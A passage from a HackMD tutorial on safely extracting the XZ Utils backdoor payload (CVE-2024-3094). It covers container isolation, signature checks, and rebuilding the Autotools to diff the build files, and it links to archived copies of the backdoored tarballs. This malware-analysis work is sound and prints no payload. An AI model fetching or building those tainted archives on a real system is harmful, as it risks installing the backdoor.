# How to extract the XZ backdoor malware payload
Documents reproducible step-by-step progress to safely extract the
malware payload from the tainted XZ Utils release tarball.
<https://hackmd.io/@cve-2024-3094/how-to-extract-the-malware-payload>
## Table of contents
[TOC]
## Prerequisites
The following conditions must be met in order to run this tutorial:
* A host machine has any of the virtualization solutions ready:
+ A container runtime(e.g. [Docker Engine](https://docs.docker.com/engine/)/Podman)
+ A virtual machine hypervisor(e.g.
QEMU-KVM/Oracle Virtualbox/VMware Player or Workstation)
* Internet access is available in the host machine.
In this tutorial the Docker container runtime is used, though other virtualization solutions may be used with minor modifications to the process.
Note that the command examples in the following sections assumes that
you're using a Bash shell, you may need to translate it to the
equivalent variants of your specific shell when running them.
## Reproducible environment
The following are the environment that reproduces the tutorial during
the writing process:
### Host operating system
Ubuntu 24.04
### Guest operating system (to actually do the extraction)
Ubuntu 22.04
### Docker Engine
24.0.5
## Launch a text terminal emulator application
Most of the following steps are required to be executed in a text
terminal, launch your preferred text terminal emulator application to do
so.
## Create a working directory for this specific tutorial
To avoid accidental usage the tainted software, we should store all
files that may be malicious in a specific folder (especially not your
Downloads folder).
Use your preferred file manager application or run the following shell
command to do so:
```bash
mkdir '/path/to/the/hosting/dir/CVE-2024-3094 vulnerability research'
```
## Switch to the working directory
Run the following command to switch your working directory in order to
minimize the keystroke required to refer files in that directory:
```bash
cd '/path/to/the/hosting/dir/CVE-2024-3094 vulnerability research'
```
## Fetch the Ubuntu 22.04 Docker container image from the container registry.
To reduce the time required for [the Update the container system to avoid zero-day exploits](#Update-the-container-system-to-avoid-zero-day-exploits) step during each tutorial reproduction session, fetch the latest Ubuntu 22.04 container image from the Docker registry by run the following command _as root_:
```bash
docker pull ubuntu:22.04
```
The command should have either one of the following similar output, depending on whether you already have the latest specified container image downloaded to your local host:
```output
22.04: Pulling from library/ubuntu
062e51aa1fb4: Pull complete
Digest: sha256:5cd569b792a8b7b483d90942381cd7e0b03f0a15520d6e23fb7a1464a25a71b1
Status: Downloaded newer image for ubuntu:22.04
docker.io/library/ubuntu:22.04
```
```output
22.04: Pulling from library/ubuntu
Digest: sha256:77906da86b60585ce12215807090eb327e7386c8fafb5402369e421f44eff17e
Status: Image is up to date for ubuntu:22.04
docker.io/library/ubuntu:22.04
```
:::info
**Note:**
If you are in a networking environment where the Internet access is only available through a specific HTTP/HTTPS proxy service, you need to merge the following JSON dictionary keys and values with your Docker Daemon configuration file:
```json
{
"proxies": {
"http-proxy": "_http_proxy_url_",
"https-proxy": "_https_proxy_url_",
"no-proxy": "*.local,127.0.0.0/8,192.168.0.0/16,10.0.0.0/8,172.16.0.0/12"
}
}
```
and restart the Docker daemon to let the configuration change become effective. Refer the [Configure Docker to use a proxy server | Docker Docs](https://docs.docker.com/network/proxy/) official documentation for more information.
:::
## Launch a Docker container to avoid accidentally compromising the system that used to inspect the malicious payload
:::danger
**Security implications:**
It would even be safer if a virtual machine is created for this case, as the isolation of the guest and the host system is even better.
This is still isn't 100% safe though, given that [virtual machine escape exploits still exist](https://en.wikipedia.org/wiki/Virtual_machine_escape). Doing the work in another non-critical host machine with a likely malware-incompatible CPU architecture(like ARM or RISC-V) would be your best bet of safety.
:::
Run the following commands _as root_ to launch a ephemeral Docker container for the inspection of the malicious payload:
```bash
docker_run_opts=(
# Destroy the container after exiting the run session
--rm
# Allows the interactive mode bash shell to properly run
--interactive
--tty
# Mount the working directory under the /project directory
# in the container for easy access to the tainted XZ Utils
# files via the bind-mount Docker volume mechanism
--mount "type=bind,source=${PWD},destination=/project"
# Configure host-facing human-readable container name
--name cve-2024-3094
# Configure guest-facing human-readable container name
# This is to prevent accidental out-of-scope usage of
# this container, which should only be use in the scope
# of this tutorial
--hostname cve-2024-3094
# Configure a custom DNS server instead of what the host is
# currently using to avoid disclosing such info to the malware
# 1.1.1.1 is a public DNS service hosted by Cloudflare
--dns 1.1.1.1
)
docker run "${docker_run_opts[@]}" ubuntu:22.04
```
:::info
**Note:**
* The `array=(...)` command is in [the GNU Bash shell scripting language's indexed array assignment syntax](https://www.gnu.org/software/bash/manual/html_node/Arrays.html), the above command example uses this notion to add descriptive comments for the command-line options and their arguments.
* The `"${array[@]}"` notion is [one of the Bash scripting language's
ansion syntax](https://www.gnu.org/software/bash/manual/html_node/Shell-Parameter-Expansion.html), which will be replaced *by each of the double-quoted array members, separated by a space character* after expansion. You can prepend the `echo` command before the command containing such notion(e.g. `echo "${array[@]}"`) to preview the expanded result.
:::
:::info
**Note:**
If you're in an network environment where Internet access is only
available through an HTTP/HTTPS proxy, run the following commands
before the invocation of the `docker run` command:
* `docker_run_opts+=(--env http_proxy=__HTTP_PROXY_URL__)`
* `docker_run_opts+=(--env https_proxy=__HTTPS_PROXY_URL__)`
You may omit part of the argument of the `--env` `docker run`
command-line option *after the equal sign(not including the trailing
closing parenthesis)* if you already have the environment variables set
in you host machine.
:::
:::info
**Note:**
By default the Ubuntu container image has the timezone set to the
[Coordinated Universal Time(UTC)](https://en.wikipedia.org/wiki/Coordinated_Universal_Time),
if you're in a different timezone you can run the following command to
fix the timezone settings:
```bash
docker_run_opts+=(--env TZ=_std__offset_)
```
Replace the _std_ placeholder of the `TZ` environment variable's value
to a suitable time zone abbreviation, refer [List of time zone abbreviations - Wikipedia](https://en.wikipedia.org/wiki/List_of_time_zone_abbreviations)
for the full list of them or simply use `LOC` as it doesn't really
used other than displaying such abbreviation to the user so it doesn't
really matter much.
Replace the _offset_ placeholder of the `TZ` environment variable's
value to the time value you must add to the local time to get a UTC time. It has a `[+|-]hh[:mm[:ss]]` format where the square bracket pair denotes optional field and the pipe(`|`) character denotes possible alternations, and for the `hh`, `mm`, and `ss` fields leading zeros can also be omitted.
For example for users in Taiwan(UTC+8) a proper `TZ` value would be `CST-8`, as the time zone abbreviation is `CST` and minus 8 hours must be applied to the local time to get the UTC time.
:::
:::danger
**Security implications:**
You may not need to run the `docker run` command as root if you've set the proper permission to access the Docker daemon control socket, however, this setup also [has security implications that need to be taken care of](https://docs.docker.com/engine/security/#docker-daemon-attack-surface).
:::
:::warning
**Warning:**
It is recommended to access all data from the potentially evil actor from within the container/virtual machine's isolation from this point as such data may contain malicious logic that may compromise your host system.
:::
## (Optional) Switch to use a local Ubuntu software repository mirror service
By default the Ubuntu docker container image has the `archive.ubuntu.com`
software archive URL configured in the APT software package management
system software sources list, however the servers of this address are
located in England and United States(according to the ip
address-geolocation lookup results):
```bash
$ dig +short archive.ubuntu.com @1.1.1.1
91.189.91.83
91.189.91.82
185.125.190.36
91.189.91.81
185.125.190.39
```
![IP address-geolocation lookup result for the "91.189.91.81" IP address, indicate that the server is likely in United States](https://hackmd.io/_uploads/rkhXy5KyA.png "IP address-geolocation lookup result for the \"91.189.91.81\" IP address, indicate that the server is likely in United States")
![IP address-geolocation lookup result for the "185.125.190.36" IP address, indicate that the server is likely in England](https://hackmd.io/_uploads/BkSukqt10.png "IP address-geolocation lookup result for the \"185.125.190.36\" IP address, indicate that the server is likely in England")
...and thus the package download speed will be limited if you don't
live in one of these regions.
To fix this problem we can switch to [your local country representative mirror service](https://wiki.ubuntu.com/Mirrors)
(using the _country_code_.archive.ubuntu.com domain, where
_country_code_ is [a ISO 3166-1 alpha-2 code](https://en.wikipedia.org/wiki/ISO_3166-1_alpha-2#Current_codes))
or [one of your local regular mirror services](https://launchpad.net/ubuntu/+archivemirrors)
of the Ubuntu software repository archives by running the following
commands _as root_:
```bash
read_opts=(
# Specify input prompt to present to the user
-p 'Input the domain name of your local Ubuntu software archive mirror service: '
# Don't allow backslash sequences in the input data to be
# interpreted
-r
)
read "${read_opts[@]}" archive_mirror_domain
# FIXME: The domain name validation regex is not rigorous assuming that
# an domain like 你好.世界 exists(which it does)
regex_domain_name='^.+\..+$'
if ! [[ "${archive_mirror_domain}" =~ ${regex_domain_name} ]]; then
printf \
'Error: The specified domain name is invalid.\n.' \
1>&2
else
now_timestamp="$(date +%Y%m%d-%H%M%S)"
sed_opts=(
# Modify the content of the input file in-place, which creating a
# backup file in order to revert the changes without hassle.
--in-place=".orig.${now_timestamp}"
# Use extended regular expression(E.R.E.) as it is more robust than
# the default basic regular expression(B.R.E.) variant
--regexp-extended
# Apply the sed expression to replace the default software
# repository domain to your local regions's ubuntu software archive
# mirror domain:
# Replace every string that matches the `//[^/]*/ubuntu/` regular
# expression to `//${archive_mirror_domain}/ubuntu/`
--expression="s@//[^/]*/ubuntu/@//${archive_mirror_domain}/ubuntu/@"
)
sed "${sed_opts[@]}" /etc/apt/sources.list
fi
```
As the software sources are modified we need to refresh the APT software package management system's local cache the make the modification effective, run the following command _as root_ should do so:
```bash
apt update
```
## Update the container system to avoid zero-day exploits
As the release archive to inspect is potentially dangerous, we should fully update our container system to reduce the possibility that a 0day exploit may be used to compromise our container system (and in turn, our working host system).
Run the following command _as root_ to achieve so:
```bash
apt full-upgrade
```
:::danger
**Security implication:**
Note that the currently running container process(the Bash shell you're pasting commands to) is still *unpatched* and may still be exploited by the attacker, to mitigate this risk launch a subshell by running the following command:
```bash
bash
```
If you want to avoid the mitigation please avoid `source`-ing or `.`-ing any scripts or non-script files in the project.
:::
## Change the working directory to the in-container working directory
Run the following command to change the working directory to the bind-mounted working directory:
```
cd /project
```
## Retrieve the tainted upstream release archives
The upstream release archives are not accessible right now as GitHub
disabled the access to [the upstream project Git repository](https://github.com/tukaani-project/xz).
![Screenshot of the "This repository has been disabled." error page of the upstream GitHub repository](https://hackmd.io/_uploads/r1y6E4tk0.png "Screenshot of the \"This repository has been disabled.\" error page of the upstream GitHub repository")
Fortunately, with the help of [the Wayback Machine](https://web.archive.org/)
and [some](https://github.com/thesamesam/xz-archive) [other](https://github.com/0xlane/xz-cve-2024-3094)
third-party backups we are still able to retrieve them as well as the
PGP signature that can be used to verify its authenticity (to the extent
of an incomplete [PGP web of trust](https://en.wikipedia.org/wiki/Web_of_trust)).
You may locate the files in [the Wayback Machine search results page for the <https://github.com/tukaani-project/xz/releases/download/*> URLs](https://web.archive.org/web/*/https://github.com/tukaani-project/xz/releases/download/*),
and [some](https://github.com/thesamesam/xz-archive), [other](https://github.com/0xlane/xz-cve-2024-3094),
sources, or simply download the files from the following currated list
using your preferred web browser application:
* [https://github.com/tukaani-project/xz/releases/download/v5.6.1/xz-5.6.1.tar.bz2 (from the 2024/3/29 21:54:28 snapshot from the Wayback Machine)](https://web.archive.org/web/20240329215428%2a/https://github.com/tukaani-project/xz/releases/download/v5.6.1/xz-5.6.1.tar.bz2)
* [https://github.com/tukaani-project/xz/releases/download/v5.6.1/xz-5.6.1.tar.bz2.sig (from the 2024/3/29 21:54:30 snapshot from the Wayback Macqhine)](https://web.archive.org/web/20240329215430%2a/https://github.com/tukaani-project/xz/releases/download/v5.6.1/xz-5.6.1.tar.bz2.sig)
* [https://github.com/tukaani-project/xz/releases/download/v5.6.0/xz-5.6.0.tar.bz2 (from the 2024/3/29 21:54:44 snapshot from the Wayback Machine)](https://web.archive.org/web/20240329215444%2a/https://github.com/tukaani-project/xz/releases/download/v5.6.0/xz-5.6.0.tar.bz2)
* [https://github.com/tukaani-project/xz/releases/download/v5.6.0/xz-5.6.0.tar.bz2.sig (from the 2024/3/29 21:54:45 snapshot from the Wayback Machine)](https://web.archive.org/web/20240329215445%2a/https://github.com/tukaani-project/xz/releases/download/v5.6.0/xz-5.6.0.tar.bz2.sig)
:::info
**Note:**
* We specifically choose NOT to use the **non-XZ-compressed archive
format variants** of the XZ Utils release archives as the evil actor
definitely has a deeper understanding to the XZ compression format, to
an extent they(in a highly unlikely circumstances) may have crafted
the release archive in a way that *it may trigger an unknown
vulerability when one tries to extract them*.
* Choose the earliest archived version in the Wayback Machine snapshot
selection interface(the calendar view) as future versions may not be
the original.
:::
## Verify the authenticity of the tainted XZ Utils release archive
As the XZ Utils release archives fetched from the Wayback Machine and other backup sources doesn't necessary be unmodified or even released by the evil actor themselves, we must verify their authenticity.
We can achieve so by using the [Pretty Good Privacy(PGP)](https://en.wikipedia.org/wiki/Pretty_Good_Privacy) public key of the evil actor as well as the PGP signature files distributed along with the release archives.
### Install the runtime dependencies required for verifying a PGP-signed document
First, we need to install the software required for verifying PGP-signed documents, [The GNU Privacy Guard(GnuPG)](https://gnupg.org/) is the one that is mainly used on a GNU+Linux operating system, let's install it by running the following command _as root_:
```bash
apt install gnupg
```
### Fetch a copy of the potential evil actor's PGP public key
We also need to have a copy of the PGP public key of the evil actor, which can be obtained from [the Wayback Machine](https://web.archive.org/web/20240119212247/https://xz.tukaani.org/keys/jia_tan_pubkey.txt).
Simply copy the entire `-----*PUBLIC KEY BLOCK-----`(including the beginning and ending marker lines) and save the content to the "potential-evil-actor.pubkey" new file in the working directory using a plaintext editor should suffice.
### Import the evil actor's PGP public key to the GnuPG keyring
To verify documents signed with PGP we must first import the evil actor's PGP public key to the GnuPG keyring, run the following command will do so:
```bash
gpg_opts=(
# Import the specified PGP public key into your default keyring
--import
)
gpg "${gpg_opts[@]}" potential-evil-actor.pubkey
```
The following output should be displayed:
```output
gpg: key 59FCF207FEA7F445: 1 signature not checked due to a missing key
gpg: /root/.gnupg/trustdb.gpg: trustdb created
gpg: key 59FCF207FEA7F445: public key "Jia Tan <jiat0218@gmail.com>" imported
gpg: Total number processed: 1
gpg: imported: 1
gpg: no ultimately trusted keys found
```
:::info
**Note:**
* The `gpg: key 59FCF207FEA7F445: 1 signature not checked due to a missing key` warning message is due to the fact that the public key of the unknown person that signed the evil actor's PGP keypair is not in your keychain, which is an expected result as the keychain does not exist in the first place.
* The `gpg: no ultimately trusted keys found` warning message is due to the fact that [the PGP web of trust](https://en.wikipedia.org/wiki/Web_of_trust) is missing for this particular public key, which is expected as the web of trust requires that you have your own private/public key pair and has signed(trusted) either the evil actor's keypair, or other people's keypairs who (directly or indirectly) have signed the evil actor's keypair, which does not exist in the first place. How to satisfy such trust model to get rid of the warning, however, is out of the scope of this tutorial.
:::
### Verify the authenticity of the PGP-signed XZ Utils release archive
Run the following command to verify the release archive's authenticity:
```bash
gpg_opts=(
# Verify the authenticity of the xz-5.6.1.tar.bz2 file using the
# detached PGP signature file xz-5.6.1.tar.bz2.sig(and the signer's
# PGP public key in your keyring)
--verify xz-5.6.1.tar.bz2.sig xz-5.6.1.tar.bz2
)
gpg "${gpg_opts[@]}"
```
The following output should be displayed:
```output
gpg: Signature made Sat Mar 9 08:22:45 2024 UTC
gpg: using RSA key 22D465F2B4C173803B20C6DE59FCF207FEA7F445
gpg: Good signature from "Jia Tan <jiat0218@gmail.com>" [unknown]
gpg: WARNING: This key is not certified with a trusted signature!
gpg: There is no indication that the signature belongs to the owner.
Primary key fingerprint: 22D4 65F2 B4C1 7380 3B20 C6DE 59FC F207 FEA7 F445
```
:::info
**Note:**
* The `gpg: Good signature from "_display_name_ <_email_address_>..."` output indicates that the PGP-signed file is successfully verified. The `[unknown]` part at the end of such line indicates that the trustworthyness of the keypair that signed the file is determined to be "unknown" according to the [the PGP web of trust](https://en.wikipedia.org/wiki/Web_of_trust).
* The `WARNING: This key is not certified with a trusted signature! There is no indication that the signature belongs to the owner.` warning message is due to the fact that [the PGP web of trust](https://en.wikipedia.org/wiki/Web_of_trust) is missing for the evil actor's public key, refer the `gpg: no ultimately trusted keys found` warning message note above for more info.
:::
Now we know that the release archive is indeed signed by the potential evil actor, the result of the further extraction process should be reproducible by everyone as long as they also retrieves the same file.
## Installing softwares that are needed for extracting the tainted XZ Utils release archive
Now we shall extract the tainted XZ Utils release archive, according to the `.tar.bz2` filename extension the release archive is a bzip-compressed tarball, you can run the following command *as root* to install software that is needed for extracting such files:
```bash
bzip_tarball_extraction_dependency_pkgs=(
# For uncompressing the bzip2 compressed file
bzip2
# For extracting the plain tar archive file
tar
)
apt install "${bzip_tarball_extraction_dependency_pkgs[@]}"
```
## Extract the tainted the XZ Utils release archive
Run the following command to extract the XZ Utils release archive:
```bash
tar_opts=(
# Specify to uncompress and extract the specified archive
--extract
--file xz-5.6.1.tar.bz2
)
tar "${tar_opts[@]}"
```
:::warning
**Note:**
It is recommended to use in-container utilities to inspect the files from the potential evil actor as you may unintentionally run the programs inside of it(by the GUI double-click mechanism) or have your system compromised due to a vulnerability of one of your host system's components being exploited.
:::
## Clone the upstream project's Git repository to the localhost
We can rebuild the unmodified aforementioned build system files from the source tree checked-out from [the upstream Git repository](https://git.tukaani.org/?p=xz.git) to compare what actually did the evil actor do to the files.
The firt step would be to install [the Git version control system software](https://git-scm.com/), you can run the following command _as root_ to do so:
```bash
apt install git
```
then run the following command to clone [the upstream Git repository](https://git.tukaani.org/?p=xz.git) to the local host and check-out the 5.6.1 version from it:
```bash
git_clone_opts=(
# Limit the history to fetch only 1 commit of history to reserve
# storage space, internet data usage, and fetch time
--depth=1
# Checkout the v5.6.1 tag only
--branch v5.6.1
)
git clone "${git_clone_opts[@]}" \
https://git.tukaani.org/xz.git \
xz-git
```
Let's change the working directory back to initial one, as we no longer need to perform Git operations:
```bash
cd /project
```
## Read the XZ Utils installation document
Now we can read the Installation document(INSTALL) in the XZ Utils source tree, however we need a pager utility to do so. As the pager utility available in the Ubuntu container by default is `more` which is limited in browsing features(e.g. page up), let's install the much capable `less` pager by running the following command _as root_:
```bash
apt install less
```
:::danger
**Security implication:**
Never use the `cat` command to read a file, the file may contain escape code that may be interpreted by your terminal, which [may have unintended or even malicious results](https://twitter.com/0xAsm0d3us/status/1774534241084445020). Using a pager utility(e.g. `less`) to mitigate such risks.
:::
Then we can read [the installation document in the XZ Utils source tree](https://git.tukaani.org/?p=xz.git;a=blob;f=INSTALL;h=624a107;hb=fd1b975) by running the following command:
```bash
less xz-git/INSTALL
```
:::info
**Note:**
Press the `q` key on your keyboard to leave the `less` pager program.
:::
## Determine the software used to generate the build system files
According to [the Preface section of the XZ Utils installation document](https://git.tukaani.org/?p=xz.git;a=blob;f=INSTALL;h=6a990ef275ae2567439ee128faa48b04e2b3451f;hb=HEAD#l37), XZ Utils uses [the GNU build system](https://www.gnu.org/software/automake/manual/html_node/GNU-Build-System.html) to build the software, which may include the following (including, but not limited to) software components:
* [GNU Autoconf](https://www.gnu.org/software/autoconf/)
For automatically generating a build configuration program suitable for usage in many processor architectures and operating systems.
* [GNU Automake](https://www.gnu.org/software/automake/)
A tool for automatically generating `Makefile.in` files compliant with the GNU Coding Standards.
* [GNU Libtool](https://www.gnu.org/software/libtool/)
For hiding the complexity of using shared libraries behind a consistent, portable interface.
(The XZ Utils software also implements [the CMake build system](https://cmake.org/) as an alternative build system, however, since the malware injection is not made into that portion it is out of scope of this tutorial).
It would be more helpful if we build the build system files using the *exact* same version of software that the evil actor do as it will introduce less noise during the content comparison operation(to figure out what actually the evil actor do to inject the malicious code).
We can determine the version of the GNU Autoconf build tool used by the software(assuming that it is not obfuscated by the evil actor), by checking the heading comment of the build configuration program of the released source code by running the following command:
```bash
head_opts=(
# Only show 3 lines instead of the default 10
--lines=3
)
head "${head_opts[@]}" xz-5.6.1/configure
```
which should have the following output, indicate that the Autotool version used for building the build files is likely **2.72**:
```output
#! /bin/sh
# Guess values for system-dependent variables and create Makefiles.
# Generated by GNU Autoconf 2.72 for XZ Utils 5.6.1.
```
We can determine the version of the GNU Automake build tool used by the software(assuming that it is not obfuscated by the evil actor), by checking the heading comment of the Makefile input file of the released source code by running the following command:
```bash
head_opts=(
# Only show 3 lines instead of the default 10
--lines=3
)
head "${head_opts[@]}" xz-5.6.1/Makefile.in
```
which should have the following output, indicate that the Automake version used for building the build files is likely **1.16.5**:
```output
# Makefile.in generated by automake 1.16.5 from Makefile.am.
# @configure_input@
```
We can determine the version of GNU Libtool used by the software (assuming that it is not obfuscated by the evil actor), by checking the heading comment of the build-aux/ltmain.sh file of the released source code by running the following command:
```bash
head_opts=(
# Only show 5 lines instead of the default 10
--lines=5
)
head "${head_opts[@]}" xz-5.6.1/build-aux/ltmain.sh
```
which should have the following output, indicate that the GNU Libtool version used for building the build files is likely **a modified version of 2.4.7.4(with the revision fingerprint 1ec8f)**:
```output
#! /usr/bin/env sh
## DO NOT EDIT - This file generated from ./build-aux/ltmain.in
## by inline-source v2019-02-19.15
# libtool (GNU libtool) 2.4.7.4-1ec8f-dirty
```
After checking [the revision history of the GNU libtool project](https://git.savannah.gnu.org/cgit/libtool.git/log/) you can realize the actual version of it is the fourth revision beyond 2.4.7 version tag(as the commit hash(1ec8f) matches). The `-dirty` version string suffix indicate that the libtool source may have additional unknown changes that deviate it from the 1ec8f revision.
Upon inspection of [the configure.ac GNU Autoconf input file](https://git.tukaani.org/?p=xz.git;a=blob;f=configure.ac;h=075567f#l778) we can notice that the XZ Utils software also make uses the GNU Gettext internationalication(I18N) support library:
```m4
dnl Support for _REQUIRE_VERSION was added in gettext 0.19.6. If both
dnl _REQUIRE_VERSION and _VERSION are present, the _VERSION is ignored.
dnl We use both for compatibility with other programs in the Autotools family.
echo
echo "Initializing gettext:"
AM_GNU_GETTEXT_REQUIRE_VERSION([0.19.6])
AM_GNU_GETTEXT_VERSION([0.19.6])
AM_GNU_GETTEXT([external])
```
As GNU Gettext will also generate build system files to the source tree, we must build the exact same GNU Gettext version the potential evil actor used as well, which can be found via inspecting the header of the xz-5.6.1/m4/gettext.m4 file by running the following commands:
```bash
head_opts=(
# Only show 1 lines instead of the default 10
--lines=1
)
head "${head_opts[@]}" xz-5.6.1/m4/gettext.m4
```
, according to the following output, the GNU Gettext version used to build the 5.6.1 XZ Utils seems to be **0.22.4**:
```output
# gettext.m4 serial 78 (gettext-0.22.4)
```
## Install the software dependencies to generate the build system files
While the Ubuntu software distribution may provide these software with the required versions, they may also introduces additional changes on their own that will complicate the difference comparison process, so we'll have to build and install these softwares from the source code manually.
### GNU Autoconf
The installation of the GNU Autoconf software can be done by following [the Downloading Autoconf section of the Autoconf project page](https://www.gnu.org/software/autoconf/#downloading) to locate the download URLs of [the 2.72 release archive](http://ftp.gnu.org/gnu/autoconf/autoconf-2.72.tar.gz) and [its respective PGP signature file](http://ftp.gnu.org/gnu/autoconf/autoconf-2.72.tar.xz.sig) and download them to the working directory using your web browser.
Then, as usual, verify that the release archive we've downloaded are actually made by the Autotools project maintainer. We can determine who actually signed the release archive by running the following command:
```bash
gpg_opts=(
# Verify the authenticity of the autoconf-2.72.tar.xz file using the
# detached PGP signature file autoconf-2.72.tar.xz.sig(and the
# signer's PGP public key in your keyring which does not exist at
# the moment)
--verify autoconf-2.72.tar.xz.sig autoconf-2.72.tar.xz
)
gpg "${gpg_opts[@]}"
```
You should see the following error message from GnuPG:
```text
gpg: Signature made Fri Dec 22 19:13:21 2023 UTC
gpg: using RSA key 82F854F3CE73174B8B63174091FCC32B6769AA64
gpg: Can't check signature: No public key
```
The PGP signature can't be checked as we don't have the signer's public key in our PGP keyring, we can retrieve the public key using the key's ID(82F854F3CE73174B8B63174091FCC32B6769AA64) from the previous output by running the following command:
```bash
gpg_opts=(
# Specify the keyserver to fetch the public key from.
#
# GnuPG does have one set by Debian(hkps://keys.openpgp.org),
# , however, it doesn't work reliably during the writing of this
# tutorial thus the other popular one is used instead.
--keyserver keyserver.ubuntu.com
# Import the keys with the given keyIDs from a keyserver
--receive-keys 0x82F854F3CE73174B8B63174091FCC32B6769AA64
)
gpg "${gpg_opts[@]}"
```
You should see the following command output:
```text
gpg: key 91FCC32B6769AA64: public key "Zack Weinberg <zackw@panix.com>" imported
gpg: Total number processed: 1
gpg: imported: 1
```
which indicates that the one who signed the release is supposed to be Zack Weinberg <<zackw@panix.com>>. According to [the Maintainers section of the Autoconf project page](https://www.gnu.org/software/autoconf/#maintainer) the project maintainer seems to be:
* Paul Eggert
* Eric Blake <<ebb9@byu.net>>
which is wierd as Zack isn't in the list. However, from [checking the summary page of the Autoconf's Git repository](https://git.savannah.gnu.org/cgit/autoconf.git) we can verify that it is indeed
Zack Weinberg that prepares the 2.72 release:
![The screenshot of the recent commits of the GNU Autoconf source repository, "Zack Weinberg" is listed to be the author that written the "Finalize NEWS for release 2.72." revision(outlined in red)](https://hackmd.io/_uploads/Hk8opd6kR.png "The screenshot of the recent commits of the GNU Autoconf source repository")
We can now proceed to verify the released GNU Autoconf source archive:
```bash
gpg_opts=(
# Verify the authenticity of the autoconf-2.72.tar.xz file using the
# detached PGP signature file autoconf-2.72.tar.xz.sig(and the
# signer's PGP public key in your keyring)
--verify autoconf-2.72.tar.xz.sig autoconf-2.72.tar.xz
)
gpg "${gpg_opts[@]}"
```
:::info
**Note:**
As mentioned in the [Verify the authenticity of the tainted XZ Utils
release archive](#Verify-the-authenticity-of-the-tainted-XZ-Utils-release-archive)
section, the following output line indicate that the PGP-signed file is
verified successfully:
```text
gpg: Good signature from "DISPLAY NAME <EMAIL-ADDRESS>" [*]
```
:::
We can now proceed to extract the Autoconf source archive, but first we
need to install the (hopefully not malicious :P) XZ Utils software
required to do so, run the following command _as root_:
```bash
xz_tarball_uncompress_dependency_pkgs=(
xz-utils
)
apt install "${xz_tarball_uncompress_dependency_pkgs[@]}"
```
Then run the following command to extract the Autoconf source archive:
```bash
tar_opts=(
# Specify to uncompress and extract the specified archive
--extract
--file autoconf-2.72.tar.xz
)
tar "${tar_opts[@]}"
```
Now we can try building the Autoconf from source. As the build
configuration program(autoconf-2.72/configure) will create build files
in your working directory let's switch the working directory to the
autoconf source directory to avoid writing files outside of it:
```bash
cd autoconf-2.72
```
Then we can iteratively run the build configuration program to satisfy
the build requirement and finally, generate the Makefile to actually
build and install the software. Run the following command to do so:
```bash
./configure
```
The Autoconf's build configuration program prints the following error
message, which indicates that it require [the GNU M4 software](https://www.gnu.org/software/m4/m4.html)
to be installed:
```text
configure: error: no acceptable m4 could be found in $PATH.
GNU M4 1.4.8 or later is required; 1.4.16 or newer is recommended.
GNU M4 1.4.15 uses a buggy replacement strstr on some systems.
Glibc 2.9 - 2.12 and GNU M4 1.4.11 - 1.4.15 have another strstr bug.
```
We can install it by running the following command _as root_:
```bash
apt install m4
```
Now we can run the build configuration program again:
```bash
./configure
```
If you see the following output and that the Makefile file appears in
the source tree, it means that the build configuration of the GNU
Autoconf software has finished successfully:
```
configure: creating ./config.status
config.status: creating tests/atlocal
config.status: creating Makefile
config.status: creating lib/version.m4
config.status: executing tests/atconfig commands
You are about to use an experimental version of Autoconf. Be sure to
read the relevant mailing lists, most importantly <autoconf@gnu.org>.
Below you will find information on the status of this version of Autoconf.
...stripped...
```
We need [the GNU Make software](https://www.gnu.org/software/make/) to
read the Makefile to build the GNU Autoconf software, run the following
command _as root_ to do so:
```bash
apt install make
```
Now we can start building the GNU Autoconf software by running the
following command:
```bash
number_of_cpu_threads="$(nproc)"
make_opts=(
# Speed-up the build process by using multiple process at the same
# time
--jobs="${number_of_cpu_threads}"
)
make "${make_opts[@]}"
```
:::info
**Note:**
* The `$(_command_)` portion of the command is in [the Bash scripting language's _command substitution_ syntax](https://www.gnu.org/software/bash/manual/html_node/Command-Substitution.html), it will be replaced by the content outputted by the execution of the _command_.
* The `${_variable_name_}` portion of the command is in [the Bash scripting language's _parameter expansion_ syntax for regular variables](https://www.gnu.org/software/bash/manual/html_node/Shell-Parameter-Expansion.html), it will be replaced by the _variable_name_ variable's value.
:::
if the command's *exit status code* is zero it means that the build is successful. Run the following command right after the `make` command's invocation to verify this:
```bash
echo "${?}"
```
Then run the following command to install the built GNU Autoconf software to the system:
```bash
make install
```
After the installation of the GNU Autoconf software you should have the
`autoconf` command in your command search PATHs(/usr/local/bin to be
specific). You may check the version of the installation by running the
following command:
```bash
autoconf --version
```
Let's run the following command to switch the working directory back to
the initial one as we have no business to do with the Autoconf source
tree anymore:
```bash
cd /project
```
### GNU Automake
The installation of [the GNU Automake software](https://www.gnu.org/software/automake/)
can be started by locating the download URL of [the 1.16.5 release
archive](https://ftp.gnu.org/gnu/automake/automake-1.16.5.tar.xz) and
[its respective PGP signature file](https://ftp.gnu.org/gnu/automake/automake-1.16.5.tar.xz.sig)
and download them to the working directory using your web browser.
Then, as usual, verify that the release archive we downloaded are
actually made by the GNU Automake project maintainer. We can determine
who have actually signed the release archive by running the following
command:
```bash
gpg_opts=(
# Verify the authenticity of the automake-1.16.5.tar.xz file using
# the detached PGP signature file automake-1.16.5.tar.xz.sig(and the
# signer's PGP public key in your keyring which does not exist at
# the moment)
--verify automake-1.16.5.tar.xz.sig automake-1.16.5.tar.xz
)
gpg "${gpg_opts[@]}"
```
You should see the following error message from GnuPG:
```text
gpg: Signature made Mon Oct 4 03:23:30 2021 UTC
gpg: using RSA key 155D3FC500C834486D1EEA677FD9FCCB000BEEEE
gpg: Can't check signature: No public key
```
The PGP signature can't be checked as we don't have the signer's public
key in our PGP keyring, we can retrieve the public key using the key's
ID from the previous output by running the following command:
```bash
gpg_opts=(
# Specify the keyserver to fetch the public key from.
#
# GnuPG does have one set by Debian(hkps://keys.openpgp.org),
# , however, it doesn't work reliably during the writing of this
# tutorial thus the other popular one is used instead.
--keyserver keyserver.ubuntu.com
# Import the keys with the given keyIDs from a keyserver
--receive-keys 0x155D3FC500C834486D1EEA677FD9FCCB000BEEEE
)
gpg "${gpg_opts[@]}"
```
It should have the following output:
```output
gpg: key 7FD9FCCB000BEEEE: public key "Jim Meyering <jim@meyering.net>" imported
gpg: Total number processed: 1
gpg: imported: 1
```
:::info
**Note:**
If you still can't successfully retrieve the public key it might be the
connection has been blocked by your network's firewall, you could also
try using the `hkp://keyserver.ubuntu.com:80` keyserver which should get
through the hostile networking environment.
:::
As shown by [the GNU Automake project page](https://savannah.gnu.org/projects/automake/),
Jim Meyering is indeed the one who released the packages, so the public
key we've fetched here is probably legit:
![Screenshot of the "Latest News" section of the GNU Automake project
page, meyering(Jim Meyering) can be found in the post author information
